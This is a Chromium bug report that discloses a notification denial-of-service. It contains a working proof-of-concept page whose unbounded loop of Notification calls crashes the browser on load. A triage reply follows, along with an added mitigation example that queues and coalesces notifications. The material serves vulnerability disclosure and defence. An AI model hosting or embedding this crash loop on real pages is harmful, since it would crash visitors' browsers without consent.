Issue metadata
Notification DoS Vulnerability...
Reported by win2000...@gmail.com, Jun 14 2017
Issue description
UserAgent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce the problem:
I slightly modified/altered code that spawns an example notification by adding a loop. This caused Chromium to crash instantly upon loading the PoC page.
PoC (Notify-Loop.htm):
<script>
  // Request permission on page load. Note: the for(;;) loop below runs
  // synchronously as the script executes, so DOMContentLoaded never fires and
  // this handler only matters if the loop is removed.
  document.addEventListener('DOMContentLoaded', function () {
    // Feature-detect via `in`; a bare `!Notification` throws a ReferenceError
    // in browsers that lack the API instead of reaching the alert.
    if (!("Notification" in window)) {
      alert('Desktop notifications not available in your browser. Try Chromium.');
      return;
    }
    if (Notification.permission !== "granted")
      Notification.requestPermission();
  });

  function notifyMe() {
    // Without a grant, every call re-requests permission (Issue 677057);
    // with a grant, every call creates a new notification (Issue 462196).
    if (Notification.permission !== "granted")
      Notification.requestPermission();
    else {
      var notification = new Notification('Notification title', {
        icon: 'http://cdn.sstatic.net/stackexchange/img/logos/so/so-icon.png',
        body: "Hey there! You've been notified!",
      });
      notification.onclick = function () {
        window.open("https://stackoverflow.com/questions/2271156/chrome-desktop-notification-example");
      };
    }
  }

  // Unbounded loop: the browser never gets to throttle or coalesce the calls.
  for (;;) {
    notifyMe();
  }
</script>
Source for the unaltered unlooped notification example:
https://stackoverflow.com/questions/2271156/chrome-desktop-notification-example
What is the expected behavior?:
The Browser will lag out until it crashes.
What went wrong?:
Chromium should disallow spawning more than one notification at a time, because this can be used to overload the browser, or maybe even the whole OS if the notifications will be immediately displayed on the desktop instead of asking for permission in the browser before.
Did this work before? N/A
Chrome version: 58.0.3029.110 Channel: stable
OS Version: 6.1 (Windows 7, Windows Server 2008 R2)
Flash Version:
Any version of Google Chrome or other Chromium based browsers can be crashed by spawning infinite desktop notifications. This should not happen, because it can be used maliciously if code doing this is hosted on public websites.
Jun 19 2017
Thank you for the report! This effectively is both Issue 677057 (requesting permission) and Issue 462196 (displaying notifications). There are definitely clever things we can and should do here, such as queuing and coalescing requests in the renderer process; we just haven't been able to prioritize it accordingly yet.
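As an added example, not code from the report or from Chromium, the queuing and coalescing the comment above mentions can be sketched as a page-side broker that bounds how many notifications are in flight, merges duplicates, and holds the overflow in a bounded queue. `NotificationBroker`, `fakeShow`, `runLoop` and the limits are assumptions for illustration; `show` is injected so the logic runs outside a browser.

```javascript
// Added example (not Chromium's or the reporter's code): bound in-flight
// notifications and coalesce duplicates, as the triage comment suggests.
class NotificationBroker {
  // `show` is injected; in a page pass (title, opts) => new Notification(title, opts)
  constructor(show, { maxVisible = 3, maxQueued = 20 } = {}) {
    Object.assign(this, { show, maxVisible, maxQueued });
    this.visible = new Map(); // key -> { handle, count }
    this.queue = [];          // pending { key, title, opts }, bounded
    this.stats = { shown: 0, queued: 0, coalesced: 0, dropped: 0 };
  }
  notify(title, opts = {}) {
    const key = `${title}\u0000${opts.body || ""}`;
    // Identical notification already on screen or already waiting: merge into it.
    const live = this.visible.get(key);
    if (live || this.queue.some((p) => p.key === key)) {
      if (live) live.count += 1;
      this.stats.coalesced += 1;
      return "coalesced";
    }
    // Screen full: wait in the bounded queue, or drop once that is full too.
    if (this.visible.size >= this.maxVisible) {
      if (this.queue.length >= this.maxQueued) { this.stats.dropped += 1; return "dropped"; }
      this.queue.push({ key, title, opts });
      this.stats.queued += 1;
      return "queued";
    }
    this._display(key, title, opts);
    return "shown";
  }
  _display(key, title, opts) {
    const entry = { count: 1, handle: this.show(title, opts) };
    this.visible.set(key, entry);
    this.stats.shown += 1;
    // When the user dismisses it, free the slot and drain one queued item.
    entry.handle.onclose = () => {
      this.visible.delete(key);
      const next = this.queue.shift();
      if (next) this._display(next.key, next.title, next.opts);
    };
  }
}
// Constructed stand-in for `new Notification(...)` so the example runs in Node.
function fakeShow() { return { onclose: null }; }
// Drive it with the report's pattern: a tight loop, here cycling five bodies.
function runLoop(iterations) {
  const broker = new NotificationBroker(fakeShow, { maxVisible: 3 });
  for (let i = 0; i < iterations; i++) broker.notify("Notification title", { body: "msg " + (i % 5) });
  return { ...broker.stats, visible: broker.visible.size, waiting: broker.queue.length };
}
```

With ten thousand calls only three notifications are ever created and two wait in the queue; the rest are merged, which is the bound the unbounded `for(;;)` loop in the PoC lacks.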
Comment 1 by chrishtr@chromium.org, Jun 15 2017
Components: -Blink UI>Notifications